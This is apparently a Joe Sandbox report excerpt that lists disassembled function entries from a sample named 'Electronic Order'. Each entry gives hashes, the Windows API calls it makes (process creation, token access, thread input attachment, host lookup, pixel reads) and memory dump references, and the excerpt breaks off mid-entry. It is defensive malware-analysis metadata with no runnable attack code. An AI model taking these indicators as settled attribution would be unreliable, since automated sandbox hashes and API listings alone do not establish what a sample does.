                                      • Opcode ID: 1bee9e2a3acf74f1bf86ab40b1e3d2764635b9b1d60d1d27603ec51de9666a39
                                      • Instruction ID: efbfd722753ccb2b9e6f5b1cd7e0dabb70961fcf5c41b4138d1a9a32e9a74ce2
                                      • Opcode Fuzzy Hash: 1bee9e2a3acf74f1bf86ab40b1e3d2764635b9b1d60d1d27603ec51de9666a39
                                      • Instruction Fuzzy Hash: 3911D03A200341EFCB25AF64DC45DBA77A9FF89710B40902AF806DB260EB71D891C7A0
                                      APIs
                                      • _free.LIBCMT ref: 00DF5351
                                        • Part of subcall function 00DE594C: __FF_MSGBANNER.LIBCMT ref: 00DE5963
                                        • Part of subcall function 00DE594C: __NMSG_WRITE.LIBCMT ref: 00DE596A
                                        • Part of subcall function 00DE594C: RtlAllocateHeap.NTDLL(01590000,00000000,00000001,00000000,?,?,?,00DE1013,?), ref: 00DE598F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: c1dc846951d11bf9956e11b8608591e7c841bb7342ddd80e46dc22639f0fcf72
                                      • Instruction ID: 4e60eb4cb660dfb7d10d6cd8baed283981d2d593f1d1701d08aa0d6c28714e64
                                      • Opcode Fuzzy Hash: c1dc846951d11bf9956e11b8608591e7c841bb7342ddd80e46dc22639f0fcf72
                                      • Instruction Fuzzy Hash: CC110432404A1AAECB213F7ABC0467D37D8DF013A0F158429FB49AA195DA7289419770
                                      APIs
                                      • _memset.LIBCMT ref: 00DC4560
                                        • Part of subcall function 00DC410D: _memset.LIBCMT ref: 00DC418D
                                        • Part of subcall function 00DC410D: _wcscpy.LIBCMT ref: 00DC41E1
                                        • Part of subcall function 00DC410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DC41F1
                                      • KillTimer.USER32(?,00000001,?,?), ref: 00DC45B5
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DC45C4
                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DFD6CE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                      • String ID:
                                      • API String ID: 1378193009-0
                                      • Opcode ID: 47f59e8a8fece02a02dd249d34ae1a947668bb954d15d59f9871d315fc4bb14c
                                      • Instruction ID: 1efc194b66ae94b86eb520ff20c822e8d4c2083023b3f1cb731376dc5ae6ff98
                                      • Opcode Fuzzy Hash: 47f59e8a8fece02a02dd249d34ae1a947668bb954d15d59f9871d315fc4bb14c
                                      • Instruction Fuzzy Hash: 5621D770904788AFEB328B24D859FF7BBED9F01304F04409EE79EA7241C7745A899B61
                                      APIs
                                        • Part of subcall function 00DC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E27B20,?,?,00000000), ref: 00DC5B8C
                                        • Part of subcall function 00DC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E27B20,?,?,00000000,?,?), ref: 00DC5BB0
                                      • gethostbyname.WSOCK32(?,?,?), ref: 00E366AC
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E366B7
                                      • _memmove.LIBCMT ref: 00E366E4
                                      • inet_ntoa.WSOCK32(?), ref: 00E366EF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                      • String ID:
                                      • API String ID: 1504782959-0
                                      • Opcode ID: d1ed22d670a6857b413a676da3ff991639cdfb6692a69597b03de4aec544d169
                                      • Instruction ID: 83dbc3b33363cff685422373fef23db2ee3abe715759e6002eb64457ed83bb19
                                      • Opcode Fuzzy Hash: d1ed22d670a6857b413a676da3ff991639cdfb6692a69597b03de4aec544d169
                                      • Instruction Fuzzy Hash: 1C115E36500509AFCB04EBA5EE9AEEEB7B9EF08710B144069F506B7161DF30AE44CB71
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E19043
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E19055
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E1906B
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E19086
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: eedea39c56fad8b70629ff81c8091a487824b2ea41bf0c65707303d80acbd528
                                      • Instruction ID: 4f4940ce403f4bac863c074195d5f33f78c36124a2e6283554bf4e6a612487c9
                                      • Opcode Fuzzy Hash: eedea39c56fad8b70629ff81c8091a487824b2ea41bf0c65707303d80acbd528
                                      • Instruction Fuzzy Hash: BE115A79901218FFEB10DFA5CC84EEDBBB8FB48710F2040A5EA04B7290D6726E50DB90
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • DefDlgProcW.USER32(?,00000020,?), ref: 00DC12D8
                                      • GetClientRect.USER32(?,?), ref: 00DFB84B
                                      • GetCursorPos.USER32(?), ref: 00DFB855
                                      • ScreenToClient.USER32(?,?), ref: 00DFB860
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Client$CursorLongProcRectScreenWindow
                                      • String ID:
                                      • API String ID: 4127811313-0
                                      • Opcode ID: 9a14361dc91c4ac9f3030411b2feff6424faf88bf733165f3303912243d8c93c
                                      • Instruction ID: 4585ab1eb2f9ef53dad6c2466b24fdacada75cc45d03ee2add66ceec1640352b
                                      • Opcode Fuzzy Hash: 9a14361dc91c4ac9f3030411b2feff6424faf88bf733165f3303912243d8c93c
                                      • Instruction Fuzzy Hash: 6B11EC3D90012AAFDB10DF95D886EBEB7B8FB06301F10445AE951E7151C730AA568BB9
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E201FD,?,00E21250,?,00008000), ref: 00E2166F
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E201FD,?,00E21250,?,00008000), ref: 00E21694
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E201FD,?,00E21250,?,00008000), ref: 00E2169E
                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00E201FD,?,00E21250,?,00008000), ref: 00E216D1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CounterPerformanceQuerySleep
                                      • String ID:
                                      • API String ID: 2875609808-0
                                      • Opcode ID: 779efe3fa971b471df0734b9cc11aabc7a5bca05d1e4cb2fb6d2d66e2dfd604d
                                      • Instruction ID: 97177d725089cc4ec8a481d1048a57edcb9c3206d09aa8cc55ce0e88e55c18bd
                                      • Opcode Fuzzy Hash: 779efe3fa971b471df0734b9cc11aabc7a5bca05d1e4cb2fb6d2d66e2dfd604d
                                      • Instruction Fuzzy Hash: 98113C31C0152DDBCF00AFA6E948AEEBB78FF19751F054095E944B6240CB3056A4CBE6
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction ID: 4b9cc1de67c057dde2e115ce276a08a19b7724a375e2df6d331ae42ff6e9f10e
                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction Fuzzy Hash: 4A014C3604814EBBCF125E84DC018EE3F62BF69355B5AC615FB5858031D237C9B2ABA5
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00E4B59E
                                      • ScreenToClient.USER32(?,?), ref: 00E4B5B6
                                      • ScreenToClient.USER32(?,?), ref: 00E4B5DA
                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E4B5F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClientRectScreen$InvalidateWindow
                                      • String ID:
                                      • API String ID: 357397906-0
                                      • Opcode ID: af7fdd9febb8a440d6e11353566e7b242e09a0b497765d819769826b32f501e1
                                      • Instruction ID: 7e556acdbe1fe0224f6641058d7deada6281724e720b127743a03de1423b430c
                                      • Opcode Fuzzy Hash: af7fdd9febb8a440d6e11353566e7b242e09a0b497765d819769826b32f501e1
                                      • Instruction Fuzzy Hash: A81146B9D00209EFDB41CF99D4449EEFBF5FB09310F104166E915E3220D735AA558F91
                                      APIs
                                      • _memset.LIBCMT ref: 00E4B8FE
                                      • _memset.LIBCMT ref: 00E4B90D
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E87F20,00E87F64), ref: 00E4B93C
                                      • CloseHandle.KERNEL32 ref: 00E4B94E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memset$CloseCreateHandleProcess
                                      • String ID:
                                      • API String ID: 3277943733-0
                                      • Opcode ID: f0e329acbbd3469a6be0c9bf9fc26e8febe9dd095a90ea04c33925ab6cab6cfe
                                      • Instruction ID: 564dfe55c2e04f430723b1e25103d9fcdb477301e1d9fc35c899c22399bbf78f
                                      • Opcode Fuzzy Hash: f0e329acbbd3469a6be0c9bf9fc26e8febe9dd095a90ea04c33925ab6cab6cfe
                                      • Instruction Fuzzy Hash: 25F05EB2658310BFE2103B67AC0AFBB3A9CEB09755F101060FB4CF6192D771990487B8
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 00E26E88
                                        • Part of subcall function 00E2794E: _memset.LIBCMT ref: 00E27983
                                      • _memmove.LIBCMT ref: 00E26EAB
                                      • _memset.LIBCMT ref: 00E26EB8
                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E26EC8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                      • String ID:
                                      • API String ID: 48991266-0
                                      • Opcode ID: 65e22003aeb8ec38e96b21f5640eda4aaa83e700cc607fdb7534cea245f97c09
                                      • Instruction ID: 9dd2fc3835906cf1e12104a596f6aea11ea4b0dd5d9ebf787559c46d8e6e7818
                                      • Opcode Fuzzy Hash: 65e22003aeb8ec38e96b21f5640eda4aaa83e700cc607fdb7534cea245f97c09
                                      • Instruction Fuzzy Hash: 06F0543A200210ABCF016F55EC85A4ABB69EF85320B048061FE086F227C771E951CBB4
                                      APIs
                                        • Part of subcall function 00DC12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DC134D
                                        • Part of subcall function 00DC12F3: SelectObject.GDI32(?,00000000), ref: 00DC135C
                                        • Part of subcall function 00DC12F3: BeginPath.GDI32(?), ref: 00DC1373
                                        • Part of subcall function 00DC12F3: SelectObject.GDI32(?,00000000), ref: 00DC139C
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E4C030
                                      • LineTo.GDI32(00000000,?,?), ref: 00E4C03D
                                      • EndPath.GDI32(00000000), ref: 00E4C04D
                                      • StrokePath.GDI32(00000000), ref: 00E4C05B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                      • String ID:
                                      • API String ID: 1539411459-0
                                      • Opcode ID: 264b9ea22ef54327a06b541668216cfdcbc580b95f4294d8ff663c0f45af5504
                                      • Instruction ID: 549282bb92c3c3a57a4ded90aef065c5232b6bdd2bbc91d5d38b72ca80e74050
                                      • Opcode Fuzzy Hash: 264b9ea22ef54327a06b541668216cfdcbc580b95f4294d8ff663c0f45af5504
                                      • Instruction Fuzzy Hash: 5DF0BE39002269FFDB226F52AC0EFCE3F58AF06710F144000FA15320E287B5055ACBA5
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E1A399
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E1A3AC
                                      • GetCurrentThreadId.KERNEL32 ref: 00E1A3B3
                                      • AttachThreadInput.USER32(00000000), ref: 00E1A3BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: bd10ed6bdd4cc193d05ab86e49838fd76230dd0731981846847768d44a94594d
                                      • Instruction ID: a003588233c585bf101ca45d9d70715be4a4131570e46b13bf7a65db637011ef
                                      • Opcode Fuzzy Hash: bd10ed6bdd4cc193d05ab86e49838fd76230dd0731981846847768d44a94594d
                                      • Instruction Fuzzy Hash: ECE01571542228BAEB211FA2DC0CFEB7E5CEF16BA1F048075F909A4060C671C5858BE0
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 00DC2231
                                      • SetTextColor.GDI32(?,000000FF), ref: 00DC223B
                                      • SetBkMode.GDI32(?,00000001), ref: 00DC2250
                                      • GetStockObject.GDI32(00000005), ref: 00DC2258
                                      • GetWindowDC.USER32(?,00000000), ref: 00DFC0D3
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00DFC0E0
                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00DFC0F9
                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00DFC112
                                      • GetPixel.GDI32(00000000,?,?), ref: 00DFC132
                                      • ReleaseDC.USER32(?,00000000), ref: 00DFC13D
                                      Similarity
                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                      • String ID:
                                      • API String ID: 1946975507-0
                                      • Opcode ID: b85f819f7d9dd4bcbe95176fe188454cbd282928d1920402e18cc62e010a337b
                                      • Instruction ID: 9daf090d25b3776f5e75c273d9c442bf0c486fbbe80385c52e2d8967dddfa719
                                      • Opcode Fuzzy Hash: b85f819f7d9dd4bcbe95176fe188454cbd282928d1920402e18cc62e010a337b
                                      • Instruction Fuzzy Hash: C5E06D36500248EEEB215FA5FC0DBE87B10EB06736F048366FB69681E287714996DB21
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 00E18C63
                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E1882E), ref: 00E18C6A
                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E1882E), ref: 00E18C77
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E1882E), ref: 00E18C7E
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken
                                      • String ID:
                                      • API String ID: 3974789173-0
                                      • Opcode ID: 3602a8783bbcedc8d9d2bcaf062be4927b63fb680a0be6f04d31c737333a390b
                                      • Instruction ID: d1f0a3963183d43cbfc3ab9413ef548732adbc79620a598f5d4fca743d55f41c
                                      • Opcode Fuzzy Hash: 3602a8783bbcedc8d9d2bcaf062be4927b63fb680a0be6f04d31c737333a390b
                                      • Instruction Fuzzy Hash: 35E0863A642211DFD7205FB66E0CB977BACEF92B96F054828F245E9050DA34848ACB61
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 00E02187
                                      • GetDC.USER32(00000000), ref: 00E02191
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E021B1
                                      • ReleaseDC.USER32(?), ref: 00E021D2
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 536b4827e0faa5031da8ad8396bf09bfe46e9745cea4de797d9e1d7c6417eee7
                                      • Instruction ID: a5320aff6b22a91a4025164d4b819912fed84a9aebbb7b031ccd23c18be989d5
                                      • Opcode Fuzzy Hash: 536b4827e0faa5031da8ad8396bf09bfe46e9745cea4de797d9e1d7c6417eee7
                                      • Instruction Fuzzy Hash: EAE0E579800605EFDB01AF62D808A9E7BF1EB4D750F128469FD5AA7260CB7881469F90
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 00E0219B
                                      • GetDC.USER32(00000000), ref: 00E021A5
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E021B1
                                      • ReleaseDC.USER32(?), ref: 00E021D2
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: d73c28352eb8786da720eb67a64513f07b0b94fa61933d3a3741720d6c2a554c
                                      • Instruction ID: 53e73cf3d82d6f8f6c9ce4e09a5d74e72e0fbf30860f2c2351d851ab5fcbe4a0
                                      • Opcode Fuzzy Hash: d73c28352eb8786da720eb67a64513f07b0b94fa61933d3a3741720d6c2a554c
                                      • Instruction Fuzzy Hash: 4FE01A79800205EFCF01AF72C808A9E7BF1EB4D710F128069FD5AE7260CB7891469F90
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: %
                                      • API String ID: 0-2291192146
                                      • Opcode ID: 77282999bcb9f57263d13597bfdf36ccd2b3749b880d2e25f36f3435c84319ba
                                      • Instruction ID: 1b701d43f6e182cc5d52aae632a16bb4c149bba0f8718c22e89045b899ffc36e
                                      • Opcode Fuzzy Hash: 77282999bcb9f57263d13597bfdf36ccd2b3749b880d2e25f36f3435c84319ba
                                      • Instruction Fuzzy Hash: 67B16C7590420B9ACF14EF98C481FEEB7B4EF44310F64412EE952A7295DA34DE82CBB1
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __itow_s
                                      • String ID: xr$xr
                                      • API String ID: 3653519197-2528877900
                                      • Opcode ID: dc34f60ed04ab49dc6f6394a00a7eca244eafe4987a279b183f7958fe81ef859
                                      • Instruction ID: 65eaedc81b18ea63362f5ffd3bcc02b169e9788778da81e2fa1e91dcbf5bd4eb
                                      • Opcode Fuzzy Hash: dc34f60ed04ab49dc6f6394a00a7eca244eafe4987a279b183f7958fe81ef859
                                      • Instruction Fuzzy Hash: 74B19170A00109EFCB14DF54C895EBEBBB9FF58304F149559FA46AB252EB70E941CB60
                                      APIs
                                        • Part of subcall function 00DDFEC6: _wcscpy.LIBCMT ref: 00DDFEE9
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • __wcsnicmp.LIBCMT ref: 00E2B298
                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E2B361
                                      Strings
                                      Similarity
                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                      • String ID: LPT
                                      • API String ID: 3222508074-1350329615
                                      • Opcode ID: 751e400719b0628d565d1a72d58d2ba5b924fb5a49db0bfca3680abe6005cace
                                      • Instruction ID: 7bab96765ca6ef369cae42d313578b998378b62346d85310f4d8d00be364c01c
                                      • Opcode Fuzzy Hash: 751e400719b0628d565d1a72d58d2ba5b924fb5a49db0bfca3680abe6005cace
                                      • Instruction Fuzzy Hash: 24616176A00225EFCB14EF94D895EEEB7B4EF08710F15506AF546BB291DB70AE40CB60
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 00DD2AC8
                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00DD2AE1
                                      Strings
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: 749870e8af16ddcd6163cc982756af3b300c9f2dd3202e63d25e7510eff3a494
                                      • Instruction ID: 744ad8972d6f371a7591aefd810498e6ca8409991fd3fd2f78c5b20384c55c6f
                                      • Opcode Fuzzy Hash: 749870e8af16ddcd6163cc982756af3b300c9f2dd3202e63d25e7510eff3a494
                                      • Instruction Fuzzy Hash: 655148724187459BD320AF11D89AFABBBE8FF84310F42485DF1D9921A5DB708529CB26
                                      APIs
                                        • Part of subcall function 00DC506B: __fread_nolock.LIBCMT ref: 00DC5089
                                      • _wcscmp.LIBCMT ref: 00E29AAE
                                      • _wcscmp.LIBCMT ref: 00E29AC1
                                      Strings
                                      Similarity
                                      • API ID: _wcscmp$__fread_nolock
                                      • String ID: FILE
                                      • API String ID: 4029003684-3121273764
                                      • Opcode ID: aeee313f08806482ea77db88e1b60d9a456707f27ae4fd86de4bf35e807e62b2
                                      • Instruction ID: 2a4d51184a0253d3bb611aca795facfa88d4932846041e47414b33eb53c8b30f
                                      • Opcode Fuzzy Hash: aeee313f08806482ea77db88e1b60d9a456707f27ae4fd86de4bf35e807e62b2
                                      • Instruction Fuzzy Hash: 8E41D671A0061ABADF20AAA0EC46FEFB7BDEF45714F000079F904F7185DA75AA4487B1
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID: Dt$Dt
                                      • API String ID: 1473721057-4168040075
                                      • Opcode ID: ed8fd987963a17cbc217a7ef6e9e579233a39007fc00b8756fe6c76707222513
